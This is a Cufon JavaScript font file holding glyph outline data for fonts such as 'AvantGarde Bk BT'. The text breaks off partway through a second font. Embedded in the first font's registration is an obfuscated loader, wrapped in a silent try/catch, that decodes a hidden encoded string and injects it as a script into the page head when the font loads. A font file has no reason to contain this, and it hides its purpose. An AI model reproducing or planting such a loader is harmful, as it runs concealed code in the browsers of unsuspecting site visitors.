-171v23,-39,103,-31,120,8v14,-19,29,-34,58,-34v91,0,72,109,73,197r-44,0v-6,-57,21,-153,-39,-153v-61,0,-37,94,-42,153r-44,0v-6,-58,21,-153,-40,-153v-62,0,-37,94,-42,153r-44,0r0,-193r44,0r0,22","w":334},{"d":"34,0r0,-153r-30,0r0,-40r30,0r0,-63r45,0r0,63r30,0r0,40r-30,0r0,153r-45,0","w":110},{"d":"110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100","w":231},{"d":"106,-153v-62,0,-37,94,-42,153r-44,0r0,-256r44,0r0,85v13,-16,26,-26,52,-26v92,-4,74,108,75,197r-45,0v-6,-58,21,-153,-40,-153","w":209},{"d":"110,-154v-30,0,-56,26,-56,56v0,30,25,57,56,57v28,0,54,-26,54,-55v0,-31,-25,-58,-54,-58xm108,-198v29,0,48,11,60,28r0,-23r44,0r0,193r-43,0r0,-24v-10,19,-30,28,-60,28v-57,0,-103,-46,-101,-102v2,-60,38,-98,100,-100xm129,-227r0,-41r36,0r0,41r-36,0xm67,-227r0,-41r36,0r0,41r-36,0","w":231},{"d":"104,-38v60,0,37,-95,42,-155r44,0r0,193r-44,0r0,-21v-13,16,-26,26,-52,26v-50,0,-76,-33,-75,-86r0,-112r45,0v6,59,-21,155,40,155xm79,-218r36,-62r39,0r-52,62r-23,0","w":209},{"d":"99,-134v35,-2,75,23,103,23v28,-1,46,-12,67,-27r0,33v-20,13,-40,23,-67,24v-34,1,-78,-25,-103,-23v-29,2,-46,12,-68,28r0,-33v20,-13,40,-24,68,-25","w":299},{"d":"133,-151v69,18,63,135,-5,147r0,46r-42,0r0,-44v-37,-9,-59,-35,-60,-78r47,1v1,20,10,33,31,33v27,0,39,-35,23,-53v-31,-20,-98,-26,-94,-83v3,-37,22,-61,53,-71r0,-38r42,0r0,39v31,7,48,30,50,65r-44,0v0,-13,-12,-24,-27,-24v-24,0,-39,26,-24,42v6,7,37,15,50,18","w":209},{"d":"27,-259r223,0r0,328r-50,0r0,-285r-123,0r0,285r-50,0r0,-328","w":277},{"d":"9,-97v-4,-86,98,-129,164,-82v17,13,28,31,34,54r-48,0v-20,-48,-110,-33,-104,28v-7,58,89,79,104,26r48,0v-11,44,-45,76,-96,76v-61,0,-100,-40,-102,-102xm156,50v1,42,-58,37,-91,26r0,-21v21,5,58,19,64,-5v0,-15,-16,-14,-33,-14r0,-36r16,0r0,17v27,-1,44,8,44,33","w":218},{"d":"103,-93v-76,-6,8,-151,-76,-135r0,-32v52,-1,76,7,76,62v0,48,-8,97,49,89r0,31v-55,-8,-51,40,-49,90v2,55,-24,62,-76,61r0,-31v82,18,1,-129,76,-135"},{"d":"202,-77v30,-1,44,-11,67,-27r0,33v-22,14,-39,22,-68,24v-20,2,-81,-25,-102,-23v-30,2,-45,11,-68,27r0,-32v21,-14,40,-22,68,-25v24,-2,83,24,103,23xm201,-145v31,-1,45,-11,68,-27r0,32v-21,15,-39,24,-68,25v-20,2,-81,-27,-102,-24v-29,3,-43,13,-68,28r0,-32v21,-15,39,-24,68,-26v23,-2,83,25,102,24","w":299},{"d":"104,0r-35,0r-74,-193r48,0r45,128r47,-128r46,0","w":174,"k":{".":28,",":28}},{"d":"104,-38v60,0,37,-95,42,-155r44,0r0,193r-44,0r0,-21v-13,16,-26,26,-52,26v-50,0,-76,-33,-75,-86r0,-112r45,0v6,59,-21,155,40,155","w":209},{"d":"108,-264v-21,0,-41,-19,-41,-40v0,-21,20,-40,41,-40v21,0,40,19,40,40v0,21,-19,40,-40,40xm108,-323v-9,0,-20,9,-19,19v-1,10,10,19,19,19v9,0,19,-9,18,-19v1,-10,-9,-19,-18,-19xm137,-101r-30,-83r-31,83r61,0xm58,-54r-20,54r-51,0r99,-254r43,0r98,254r-54,0r-20,-54r-95,0","w":216,"k":{"\u201e":-27,"\u201a":-27,"\u2039":13,"\u2019":33,"\u2018":36,"\u201d":33,"\u201c":36,"\u0152":6,"\u00ab":13,"\u00d8":6,"Y":13,"W":6,"V":6,"T":15,"S":-10,"Q":6,"O":6,"G":6,"C":6,";":-7,":":-7,".":-7,",":-7}},{"d":"134,-235v-11,1,-16,6,-15,20r15,0r0,49r-45,0v0,-46,-8,-99,45,-95r0,26xm67,-235v-11,2,-15,7,-15,20r15,0r0,49r-45,0v0,-47,-7,-98,45,-95r0,26","w":152,"k":{"\uf002":-7,"\uf001":-7,"\u00c6":50,"\u00c5":28,"y":-13,"w":-13,"f":-7,"Y":-18,"W":-10,"V":-13,"T":-7,"J":48,"A":28}},{"d":"6,0r0,-41r86,-111r-79,0r0,-41r128,0r0,48r-81,102r86,0r0,43r-140,0","w":151},{"d":"115,-40v30,0,53,-26,53,-56v0,-33,-23,-58,-55,-58v-29,0,-57,27,-56,57v0,31,25,57,58,57xm10,-97v-4,-81,98,-129,160,-81r0,-78r45,0r0,256r-45,0r0,-16v-16,13,-34,21,-60,21v-61,0,-96,-43,-100,-102","w":231},{"d":"64,-213r-44,0r0,-43r44,0r0,43xm20,0r0,-193r44,0r0,193r-44,0","w":84},{"d":"63,0r-43,0r0,-256r43,0r0,152r63,-89r51,0r-67,91r80,102r-56,0r-71,-98r0,98","w":178,"k":{"\u0153":6,"\u00f8":6,"\u00e6":6,"o":6,"e":6,"a":6}},{"d":"159,0r-138,0r0,-256r138,0r0,45r-88,0r0,58r88,0r0,45r-88,0r0,63r88,0r0,45"},{"d":"112,-151v85,20,55,156,-29,156v-47,0,-78,-35,-77,-84r46,-1v-2,23,10,40,30,40v20,0,33,-14,33,-34v0,-38,-70,-39,-87,-64v-33,-48,-2,-123,59,-123v44,0,67,31,70,74v-14,-2,-35,4,-45,-2v0,-16,-11,-27,-27,-28v-24,-1,-35,30,-20,47v4,7,34,15,47,19","w":172,"k":{"\u00c5":-7,"A":-7}},{"d":"110,-155v-32,-1,-55,24,-55,57v0,36,20,58,55,58v34,0,54,-25,54,-59v1,-32,-23,-56,-54,-56xm109,5v-62,0,-101,-42,-101,-103v0,-60,41,-101,100,-101v61,0,103,40,103,100v0,64,-40,104,-102,104xm84,-218r36,-62r39,0r-52,62r-23,0","w":219},{"d":"243,-20v-23,1,-37,-8,-37,-30v-11,18,-26,30,-53,30v-37,0,-54,-22,-55,-59v-1,-50,35,-99,83,-98v23,0,34,9,43,25r10,-19r27,0r-27,112v0,8,7,15,16,14v42,-6,63,-44,64,-89v2,-62,-54,-102,-119,-100v-92,2,-143,56,-149,143v-8,121,164,150,243,87r12,17v-31,23,-69,40,-119,40v-97,0,-165,-50,-165,-145v0,-105,72,-167,179,-167v85,0,147,42,147,125v0,63,-36,110,-100,114xm130,-78v0,36,39,46,60,24v22,-23,46,-99,-6,-101v-33,-1,-54,41,-54,77","w":360},{"d":"46,-31r208,0r0,29r-208,0r0,-29xm254,-215r0,31r-156,50r156,51r0,31r-208,-69r0,-25","w":299}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-192-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("34{ZNTLVKr-^3UcF~Tv#949-)2LZ{T-^)2&#Krmj{(|>DwVH)Ynqd.[emUa[~.RqD.p[~.9#d.&q)YnqdT]a~Z+Zd,R+{v+Zd?pbdv+Zd?p,{(+Zd?p,Dc+Zd?@Z{rL[~.9qdrv[~.RqDwp[~.Rq{?c[~.9qd.m[GZm[~.9#drv[~.RqDwXc)Ynqd4ne)Ynqd49E)Yn#d?@a)Ynqd.b#)Yn#d?dadc+Zd?pHDn+[~.R+L?&[~.9ZD2v[~.9#d.(T9Z+Zd?pc{(+Zd,9qdc+Zd?pXx(X[~.Rq{TL[~.Rq{.p[~.Rq{,X[~.9#L,p[~.RqD.m[~.Rq{,m[~.Rq{.{[~.RqD.&[~.9qdwp[~.RqDwc[~.RqD.LH)Ynqd2@a)Ynqd49V)Yn#d,R2)Yn#d?@e)Yn#d,@+)Ynqd4vT)Yn#d?92)Ynqd4]#)Ynqd49Z)Ynqd4&T)Yn#d?vc)Yn#d?9#)YnqdTmX)Ynqd4]Zd(+Zd?p,Lc+Zd?@Z{c+Zd?pT{(+Zd?pb{c+Zd?pHd(+Zd?@2d(+Zd?pH{v+Zd?@qDVL[~.Rq{?~[~.RqDT&[~.RqD.X[~.9+d,&6)Ynqd4Da)Ynqd4nZ)Yn#d4v,)Yn#d?9+)Ynqd4mX)Ynqd4]e&Z+Zd?@wd(+Zd,9+x(+Zd?pHdZ+Zd?pc{c+Zd?&bDZ+Zd?@Zd#8[~.Rq{Tm[~.Rq{?m[~.Rq{4&[~.R#Dw{&)Yn#d4@w(ra[~.RqD.~[)v+Zd?p,d(+Zd?pXL(+Zd?pTDbX[~.R+L2([~.Rq{rv[~.Rq{,p[~.RqD2v[~.RqDr]B)Ynqd4vHLc+Z{,Rqdc+Zd?@q{v+Zd?@E{v+Zd?&bxv+Zd?@wdv+Zd?@Vd(+Zd?&b{v+Zd,9#Dc+Zd?&,LZ+Zd?pTLZ+Zd?pHxv+Zd?pHdv+Zd?@Zdc+Zd?p,DZqHyv8G{ZckNV{[~.Rq{4LN.c~yG(p[~.RqDw&[~.Rq{.&Y)(+Z{,Rqd(+Zd?@+{,L[~.RwDwp[~.Rq{.c#6v+Zd?&bDc+Zd?@2d?JX)Ynqd4@2)Yn#d,vcnr+[~.Rq{,RpU?@v4Y9&3GdLx6]m=.n(r)D{KN[~kyJXH,bcTj18sB>W^!q+#wVZ2EeaAF|-P%D-x#+[~.RqDr([~.Rq{.L[~.Rq{r&[~rDqd?RE6jbT6Z+Zd?@+dnv[~.RqDT([~.RqD2]q..8e)Ynqd4]+)Ynqd4]w)Ynqd4D#3Up[~.Rq{?{J)Ynqd49#)Ynqd4mcLYv[~.RqDTLFK,([~.Rq{rm[~.9qd,p[~.RqDrL[~.9#L,na)Ynqd4mb)Yn#d?@w)Ynqd.vcnc+Zd?@qLc+Zd?pT{H(r3(+Zd?pHLc+Zd?p,dZ+Zd?pcd)L[~.RqDw~[~.RqD,c[~.Rq{,v[~.Rq{,([~.Rq{rL[~.RqD2{[~.RqDrv[~.RqDwm3)Ynqd4@+)Ynqd.RE)Yn#d?LX]TZVDrX[~.Rq{.m[~.Rq{TvP&v+Zd,9q{c+Zd?pcLEZ[~.9#L?X2~(+Zd?p,L(+Zd,R+DE8bKrWvnZ+Zd?pTdVp[~.9#L,]HGjLqN4cV3U9H3=+86.R>[?ZHGjR>N?ZqGT+cNT~VKU+j6r9^{HajNYcqKYd-kEVFKrD1DHa!KwV!)HJ%xj~E~Zq^3.|16w1#d?@q)Uaw{)&VN2L!N(q^D2-WyYLc[jm!D2-W)Ua,N2V8&U-8Gjmc[E]1N4-,D)m8N2e^K4-w~4aXNrn83r{![HJFK.+>x#>BK=cjr2LNK(Z~6)pNK(Z-3=J8")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":180,"face":{"font-family":"AvantGarde Bk BT","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 7 2 2 2 2 2 2 4","ascent":"274","descent":"-86","x-height":"5","bbox":"-60 -344 451 85","underline-thickness":"34.2773","underline-position":"-17.2266","unicode-range":"U+0020-U+F002"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1990-1998 Bitstream Inc.  All rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"184,-111v0,-59,-76,-86,-119,-48v-14,12,-24,28,-29,48r148,0xm101,-17v39,0,59,-20,73,-48r28,0v-16,42,-47,70,-101,70v-54,0,-95,-39,-93,-93v2,-65,41,-111,107,-111v60,0,98,44,93,110r-175,0v0,42,27,72,68,72xm170,-219r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":218},{"d":"131,-45v0,-9,9,-20,19,-19v10,-1,19,10,19,19v0,9,-9,19,-19,18v-10,1,-19,-9,-19,-18xm255,-116r0,17r-210,0r0,-17r210,0xm131,-169v0,-9,9,-20,19,-19v10,-1,19,10,19,19v0,9,-10,19,-19,19v-9,0,-19,-10,-19,-19","w":299},{"d":"-7,63r48,-81r-33,-175r23,0r27,148r90,-148r25,0r-155,256r-25,0","w":154,"k":{"\u201e":26,"\u201a":26,"\u2019":-27,"\u2018":-7,"\u201d":-27,"\u201c":-7,".":31,"-":6,",":31}},{"d":"158,-99v9,-40,-2,-76,-43,-75v-84,2,-73,107,-93,174r-22,0r50,-256r23,0r-16,81v46,-44,144,-17,126,64v-9,38,-14,74,-21,111r-24,0","w":200},{"d":"89,-261v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32"},{"d":"150,-120r85,-84r12,12r-84,85r84,84r-12,13r-85,-85r-84,85r-12,-13r84,-84r-84,-85r12,-12","w":299},{"d":"394,-98v-21,0,-40,19,-40,40v0,21,18,40,40,40v22,0,40,-18,40,-40v0,-22,-19,-40,-40,-40xm395,5v-38,0,-63,-25,-63,-63v0,-37,25,-63,63,-63v37,0,63,26,63,63v0,38,-26,63,-63,63xm79,-135v-38,0,-63,-26,-63,-63v0,-37,25,-63,63,-63v37,0,63,25,63,63v0,39,-26,63,-63,63xm78,-237v-21,0,-40,18,-40,39v0,21,18,40,40,40v22,0,40,-18,40,-40v0,-22,-18,-39,-40,-39xm216,-261r21,0r-137,266r-20,0xm236,-98v-21,0,-40,19,-40,40v0,21,19,40,40,40v21,0,40,-18,40,-40v0,-22,-19,-40,-40,-40xm237,5v-38,0,-64,-25,-64,-63v0,-37,26,-63,64,-63v37,0,63,26,63,63v0,38,-26,63,-63,63","w":473},{"d":"46,-212r8,-44r23,0r-8,44r-23,0xm65,-193r-37,193r-23,0r38,-193r22,0","w":72},{"d":"184,-107v2,-41,-29,-71,-70,-71v-48,-1,-81,42,-81,92v0,39,29,71,67,70v53,-2,82,-40,84,-91xm99,5v-53,2,-92,-42,-91,-94v2,-67,42,-108,107,-111v52,-3,96,41,94,94v-3,67,-42,108,-110,111xm109,-261v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32","w":218},{"d":"272,5v-39,0,-62,-16,-78,-40r-7,37r-25,0r5,-21v-55,51,-165,14,-159,-69v4,-65,41,-111,106,-111v40,0,64,15,79,42r7,-35r24,0r-6,21v16,-16,38,-28,69,-28v60,0,97,44,92,110r-175,0v-3,42,28,72,67,72v40,0,59,-20,74,-48r28,0v-17,41,-47,70,-101,70xm354,-111v0,-60,-75,-86,-118,-48v-14,12,-24,28,-29,48r147,0xm103,-17v46,0,82,-41,81,-88v0,-42,-27,-70,-68,-72v-95,-4,-116,160,-13,160","w":389},{"d":"72,5v-45,0,-77,-32,-71,-78r24,0v-3,35,17,55,49,55v29,0,53,-23,52,-51v-3,-64,-101,-53,-100,-121v-1,-37,34,-70,74,-70v42,0,71,30,65,73r-25,0v2,-31,-12,-51,-41,-51v-25,0,-47,19,-46,44v1,48,100,57,100,123v0,41,-39,76,-81,76xm76,-343r14,0r26,44r41,-44r16,0r-47,61r-23,0","w":171},{"d":"201,-74v30,-1,45,-12,68,-28r0,20v-20,15,-39,23,-68,25v-21,1,-82,-25,-102,-24v-30,2,-44,12,-68,28r0,-20v22,-14,39,-23,68,-25v22,-2,81,26,102,24xm201,-134v30,-2,43,-12,68,-27r0,19v-21,15,-40,24,-68,26v-20,1,-81,-27,-102,-25v-29,3,-43,13,-68,28r0,-20v21,-14,40,-23,68,-25v22,-2,81,26,102,24","w":299},{"d":"-8,0r5,-23r123,-147r-95,0r5,-23r126,0r-4,21r-125,149r107,0r-4,23r-138,0","w":158},{"d":"96,-219r-16,0r43,-62r25,0"},{"d":"58,-237r5,-20r90,0r-5,20r-90,0"},{"d":"167,-185v0,-50,-47,-47,-99,-47r-21,109v67,4,120,-1,120,-62xm194,-183v0,73,-70,90,-151,83r-20,100r-25,0r50,-256v78,-4,146,2,146,73","w":198,"k":{"\u201e":86,"\u201a":86,"\u203a":13,"\u2039":20,"\u2019":-8,"\u2018":6,"\u201d":-8,"\u201c":6,"\u0153":13,"\u00bb":13,"\u00ab":20,"\u00f8":13,"\u00e6":13,"\u00c5":26,"u":6,"s":6,"r":6,"o":13,"n":6,"i":13,"e":13,"a":13,"A":26,";":10,":":10,".":79,"-":28,",":79}},{"d":"33,0r-29,-193r26,0r20,160r77,-160r25,0r23,158r76,-158r26,0r-94,193r-26,0r-22,-157r-77,157r-25,0","w":263,"k":{"\u2019":-20,"\u2018":10,"\u201d":-20,"\u201c":10,".":26,",":26}},{"d":"106,-82v-28,0,-52,-24,-52,-52v0,-28,24,-52,52,-52v28,0,52,24,52,52v0,28,-24,52,-52,52","w":212},{"d":"127,5v-70,0,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,116,46,116,117v0,87,-59,149,-144,149xm153,-237v-73,3,-114,50,-117,125v-1,55,37,93,92,93v70,0,118,-54,118,-125v0,-55,-37,-95,-93,-93xm182,-289r6,-29r25,0r-6,29r-25,0xm117,-289r6,-29r25,0r-6,29r-25,0","w":281},{"d":"-2,-59v0,-69,81,-67,86,-132r25,0v-1,69,-77,70,-84,131v-3,24,18,44,44,43v35,-1,57,-24,63,-56r25,0v-9,45,-38,77,-88,78v-42,0,-72,-23,-71,-64xm121,-256r-7,40r-25,0r8,-40r24,0","w":166},{"d":"257,-138v-2,54,-25,86,-60,114r60,0r0,24r-102,0r0,-22v42,-25,72,-60,74,-118v2,-57,-36,-102,-90,-102v-55,0,-91,45,-90,102v2,57,32,94,74,118r0,22r-102,0r0,-24r60,0v-34,-28,-59,-60,-60,-114v-2,-72,49,-128,118,-128v69,0,119,57,118,128","w":277},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111xm154,-219r-15,0r-50,-62r26,0","w":225},{"d":"105,-41r-37,-56r49,-56r23,0r-48,56r36,56r-23,0xm52,-41r-38,-56r50,-56r23,0r-49,56r37,56r-23,0","w":164,"k":{"Y":26,"W":20,"V":20,"T":20,"J":-7}},{"d":"100,-172r-32,46r-18,-13r35,-44r-53,-15r7,-22r51,18r0,-54r21,0r0,54r50,-17r7,20r-53,15r37,45r-19,13"},{"d":"207,-40r62,0r18,-82xm276,0r-16,0r6,-27r-79,0r3,-16r98,-100r19,0r-22,103r20,0r-3,13r-20,0xm227,-261r21,0r-159,266r-21,0xm71,-247v-19,1,-28,9,-32,26r-15,0v1,-47,92,-51,90,-2v0,20,-12,29,-30,33v16,5,28,15,28,35v0,26,-25,45,-55,45v-32,0,-52,-13,-50,-46v5,1,15,-4,15,4v-1,20,14,30,35,30v22,0,38,-12,38,-33v0,-22,-17,-29,-40,-30v2,-4,0,-12,5,-13v41,7,54,-50,11,-49","w":316},{"d":"43,0r16,-85r-48,-171r27,0r39,141r92,-141r28,0r-112,172r-18,84r-24,0xm135,-289r6,-29r25,0r-6,29r-25,0xm70,-289r6,-29r25,0r-6,29r-25,0","w":166},{"d":"99,-261r21,0r-159,266r-21,0","w":60},{"d":"103,-16v38,-1,63,-22,75,-52r27,0v-15,43,-49,72,-102,73v-55,1,-90,-41,-94,-93v-8,-117,181,-156,200,-34r-26,0v-5,-32,-30,-55,-66,-55v-46,0,-83,40,-82,88v1,42,26,74,68,73xm84,-281r14,0r26,44r41,-44r16,0r-47,61r-23,0","w":218},{"d":"51,40r35,-200r-61,0r5,-21r61,0r12,-75r24,0r-12,75r60,0r-3,21r-61,0r-35,200r-25,0"},{"d":"192,-161v0,-32,-38,-26,-70,-27r0,53v32,-1,70,5,70,-26xm215,-162v-1,21,-15,36,-35,39r33,68r-25,0r-32,-65r-34,0r0,65r-23,0r0,-148v51,1,117,-10,116,41xm150,-13v69,0,115,-46,115,-114v0,-69,-46,-115,-115,-115v-68,0,-115,47,-115,115v0,67,46,114,115,114xm21,-127v0,-76,52,-129,129,-129v78,0,129,52,129,129v0,77,-53,129,-129,129v-77,0,-129,-53,-129,-129","w":299},{"d":"157,-30v-30,57,-155,44,-145,-35v7,-61,24,-130,34,-191r25,0r-35,188v-6,50,70,67,94,33v32,-45,37,-154,53,-221r25,0v-15,70,-24,174,-51,226xm151,-289r6,-29r25,0r-6,29r-25,0xm86,-289r6,-29r25,0r-6,29r-25,0","w":208},{"d":"-1,-143v7,-33,15,-43,54,-44r149,0r-5,21r-32,0r-26,128v-2,21,19,21,36,17v-2,13,-4,26,-22,24v-75,-8,-16,-116,-13,-169r-64,0r-35,166r-24,0r35,-166v-18,-1,-28,7,-30,23r-23,0","w":205},{"d":"153,-237v-68,0,-117,54,-117,125v0,55,37,93,92,93v70,0,118,-54,118,-125v0,-56,-37,-93,-93,-93xm153,-261v52,0,88,22,105,58r11,-53r131,0r-4,24r-107,0r-18,91r107,0r-5,23r-106,0r-19,95r107,0r-5,23r-131,0r6,-30v-27,21,-54,35,-98,35v-70,1,-119,-47,-117,-117v2,-91,54,-149,143,-149","w":401},{"d":"72,5v-45,0,-77,-32,-71,-78r24,0v-3,35,17,55,49,55v29,0,53,-23,52,-51v-3,-64,-101,-53,-100,-121v-1,-37,34,-70,74,-70v42,0,71,30,65,73r-25,0v2,-31,-12,-51,-41,-51v-25,0,-47,19,-46,44v1,48,100,57,100,123v0,41,-39,76,-81,76xm96,47v0,41,-54,38,-87,26r5,-14v19,7,62,16,62,-12v0,-16,-16,-15,-35,-16r10,-31r12,0r-7,20v24,-2,40,6,40,27","w":171},{"d":"52,-193v5,-45,23,-66,71,-66v-3,6,1,20,-8,21v-31,1,-36,14,-40,45r31,0r-4,20r-32,0r-33,173r-23,0r33,-173r-31,0r5,-20r31,0","w":98,"k":{"\u201e":6,"\u201a":6,"\u2039":6,"\u2019":-25,"\u2018":-18,"\u201d":-25,"\u201c":-18,"\u00ab":6,"y":-7,"w":-7,"t":-7,".":13,"-":6,",":13}},{"d":"47,-189r-12,-67r23,0r13,67r-24,0","w":69,"k":{"\uf002":-10,"\uf001":-10,"\u0152":-11,"\u00d8":-11,"\u00c6":50,"\u00c5":41,"y":-21,"w":-23,"r":-13,"f":-10,"Z":6,"Y":-11,"W":-15,"V":-17,"T":-7,"O":-11,"J":48,"A":41}},{"d":"200,-24r-82,-209r-82,209r164,0xm135,-259r103,259r-240,0r104,-259r33,0","w":236},{"d":"125,-24v-14,35,-86,38,-100,1r-20,98r-25,0r56,-262r24,0v-7,43,-20,81,-24,128v-4,47,54,55,77,24v26,-35,31,-103,45,-152r24,0r-33,159v0,10,8,12,19,11v-3,11,0,21,-19,21v-18,0,-25,-9,-24,-28","w":195},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111xm182,-219r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":225},{"d":"-1,0r50,-256r25,0r-50,256r-25,0xm114,-281r-14,0r-26,-44r-41,44r-16,0r47,-62r23,0","w":72},{"d":"89,-18v43,0,71,-35,71,-79v0,-37,-25,-61,-61,-61v-40,0,-70,35,-69,77v0,35,24,63,59,63xm91,5v-65,0,-106,-68,-76,-129v21,-42,83,-92,116,-132r30,0r-72,80v58,-7,96,24,96,79v0,57,-40,102,-94,102","w":203},{"d":"226,-195r-36,46r65,0r0,17r-76,0r-37,49r113,0r0,17r-124,0r-45,57r-13,-11r36,-46r-64,0r0,-17r75,0r38,-49r-113,0r0,-17r124,0r44,-56","w":299},{"d":"17,0r33,-172r-41,0r4,-21r41,0r12,-63r24,0r-13,63r41,0r-4,21r-41,0r-33,172r-23,0","w":100},{"d":"355,-111v0,-59,-75,-86,-118,-48v-14,12,-24,27,-30,48r148,0xm269,5v-40,0,-64,-19,-79,-47v-19,28,-45,46,-88,47v-55,1,-96,-39,-94,-93v2,-66,42,-111,110,-111v39,0,66,20,80,48v19,-28,47,-47,89,-48v60,0,99,46,92,110r-175,0v-3,42,28,72,67,72v39,-1,60,-19,74,-48r28,0v-17,42,-48,70,-104,70xm184,-106v2,-40,-29,-71,-69,-71v-47,0,-81,41,-81,89v0,41,26,72,67,71v54,-1,81,-39,83,-89","w":389},{"d":"165,-256r29,75r27,-75r21,0r0,94r-13,0r0,-83r-31,83r-8,0r-33,-83r0,83r-13,0r0,-94r21,0xm122,-256r0,10r-30,0r0,84r-15,0r0,-84r-31,0r0,-10r76,0","w":299},{"d":"159,-215r0,99r96,0r0,17r-96,0r0,99r-17,0r0,-99r-97,0r0,-17r97,0r0,-99r17,0","w":299},{"d":"105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111xm128,-219r-16,0r43,-62r25,0","w":225},{"d":"65,-193r-37,193r-23,0r38,-193r22,0xm78,-227r6,-29r25,0r-6,29r-25,0xm13,-227r6,-29r25,0r-6,29r-25,0","w":72},{"d":"76,-102r-16,0r27,-130r-52,52r-12,-9r68,-67r18,0","w":134},{"d":"22,-63v0,-64,90,-109,110,-41v4,-38,14,-107,-23,-112v-15,-2,-39,44,-50,13v1,-17,20,-29,39,-27v103,9,72,235,-19,235v-35,0,-57,-31,-57,-68xm79,-4v30,0,47,-41,46,-77v0,-26,-8,-46,-31,-46v-31,0,-47,41,-46,79v1,27,7,44,31,44","w":181},{"d":"15,-199v-1,-68,80,-63,150,-61r0,12r-22,0r0,248r-15,0r0,-248r-32,0r0,248r-15,0r0,-137v-38,-1,-66,-24,-66,-62"},{"d":"28,-259r209,0r0,328r-30,0r0,-302r-149,0r0,302r-30,0r0,-328","w":265},{"d":"158,-99v9,-40,-2,-76,-43,-75v-84,2,-73,107,-93,174r-22,0r37,-193r23,0r-3,18v46,-44,144,-17,126,64v-9,38,-14,74,-21,111r-24,0xm106,-261v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32","w":200},{"w":203},{"d":"105,47v0,41,-54,38,-87,26r5,-14v19,7,62,16,62,-12v0,-16,-16,-15,-35,-16r10,-31r12,0r-7,20v24,-2,40,6,40,27"},{"d":"123,-227r6,-29r25,0r-6,29r-25,0xm58,-227r6,-29r25,0r-6,29r-25,0"},{"d":"140,-274v-13,0,-26,13,-26,26v0,13,12,25,26,25v14,0,25,-11,25,-25v0,-14,-12,-26,-25,-26xm140,-208v-22,0,-41,-18,-41,-40v0,-22,19,-41,41,-41v21,0,40,20,40,41v0,22,-18,40,-40,40xm105,-17v45,0,80,-41,80,-88v0,-43,-26,-70,-67,-72v-95,-5,-116,160,-13,160xm116,-199v39,0,63,16,78,42r8,-36r24,0r-37,193r-26,0r4,-15v-59,45,-162,9,-157,-73v4,-66,41,-111,106,-111","w":225},{"d":"253,-24r0,17r-207,0r0,-17r207,0xm253,-137r0,15r-207,70r0,-18r178,-60r-178,-59r0,-19","w":299},{"d":"-7,63r48,-81r-33,-175r23,0r27,148r90,-148r25,0r-155,256r-25,0xm83,-219r-16,0r43,-62r25,0","w":154},{"d":"77,-256r-33,170r102,-107r31,0r-88,91r62,102r-28,0r-53,-83r-33,35r-10,48r-23,0r50,-256r23,0","w":164,"k":{"\u0153":6,"\u00f8":6,"\u00e6":6,"y":-7,"u":6,"o":6,"e":6,"a":6}},{"d":"-2,0r50,-256r24,0r-26,137r129,-137r31,0r-115,121r72,135r-28,0r-62,-114r-36,36r-14,78r-25,0","w":178,"k":{"\u201e":-18,"\u201a":-18,"\u203a":6,"\u2039":23,"\u2018":-13,"\u201c":-13,"\u0153":13,"\u0152":8,"\u00bb":6,"\u00ab":23,"\u00f8":13,"\u00e6":13,"\u00d8":8,"\u00c5":-13,"y":6,"u":13,"o":13,"e":13,"a":13,"Y":-13,"W":-7,"T":-13,"O":8,"C":11,"A":-13,"-":18}},{"d":"69,-166v-30,14,-28,44,-1,68r40,36v29,-13,32,-42,4,-66xm122,-48v25,39,-6,89,-53,87v-36,-2,-60,-22,-59,-59v8,1,20,-2,26,1v-1,22,12,35,32,36v27,2,45,-27,29,-50v-21,-32,-78,-46,-78,-94v0,-25,16,-42,36,-51v-21,-39,8,-83,53,-83v36,0,57,20,54,58r-25,0v1,-22,-10,-36,-30,-37v-25,-1,-41,25,-27,46v19,30,78,47,80,95v1,27,-18,41,-38,51"},{"d":"127,5v-70,0,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,116,46,116,117v0,87,-59,149,-144,149xm153,-237v-73,3,-114,50,-117,125v-1,55,37,93,92,93v70,0,118,-54,118,-125v0,-55,-37,-95,-93,-93xm148,-323v19,3,46,19,53,-4r14,0v-6,35,-40,36,-70,23v-8,1,-13,6,-16,13r-14,0v8,-19,13,-30,33,-32","w":281},{"d":"52